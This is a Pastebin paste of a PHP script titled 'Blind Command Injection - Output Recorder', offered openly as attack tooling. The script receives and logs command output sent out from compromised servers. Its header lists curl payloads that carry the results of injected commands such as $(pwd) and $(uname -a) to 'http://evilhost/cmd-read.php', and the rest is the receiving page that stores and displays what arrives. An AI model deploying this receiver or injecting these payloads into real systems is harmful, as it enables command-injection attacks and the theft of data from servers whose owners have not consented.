Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- BLIND COMMAND INJECTION - OUTPUT RECORDER WITH CURL (WEB BASED)
- Coded By ZeroByte.ID (Schopath)
- [+] Payload :
- # curl -s "http://evilhost/cmd-read.php?cmd=$(pwd)";
- # curl -s --data-urlencode "cmd=$(uname -a)" -X POST "http://evilhost/cmd-read.php"
- */
- error_log(0);
- error_reporting(0);
- $file = "cmdrec_".md5(date("Ymd")).".log";
- if(!file_exists($file)) {
- file_put_contents("$file", "");
- }
- if(isset($_GET['cmd'])) {
- $record = $_GET['cmd'];
- $addcread = fopen($file, "a") or die("Failed open to open file!");
- fwrite($addcread, "--- Updated on ".date("Y-m-d h:i:s")." -----\n");
- fwrite($addcread, $record."\n");
- fwrite($addcread, "----------------------------------------\n");
- fclose($addcread);
- }
- else if (isset($_POST['cmd'])) {
- $record = $_POST['cmd'];
- $addcread = fopen($file, "a") or die("Failed open to open file!");
- fwrite($addcread, "--- Updated on ".date("Y-m-d h:i:s")." -----\n");
- fwrite($addcread, $record."\n");
- fwrite($addcread, "----------------------------------------\n");
- fclose($addcread);
- }
- else {
- echo "<pre>\n";
- echo "<b><big>##### BLIND COMMAND INJECTION - OUTPUT RECORDER #####</big></b><br>\n";
- print_r(file_get_contents($file));
- echo "</pre>\n";
- echo "<form method=\"post\"><input type=\"submit\" name=\"reset\" value=\"Reset Log\"></form>";
- if(isset($_POST['reset'])) {
- $addcread = fopen($file, "w") or die("Failed open to open file!");
- fwrite($addcread, "");
- fclose($addcread);
- }
- }
- ?>
RAW Paste Data
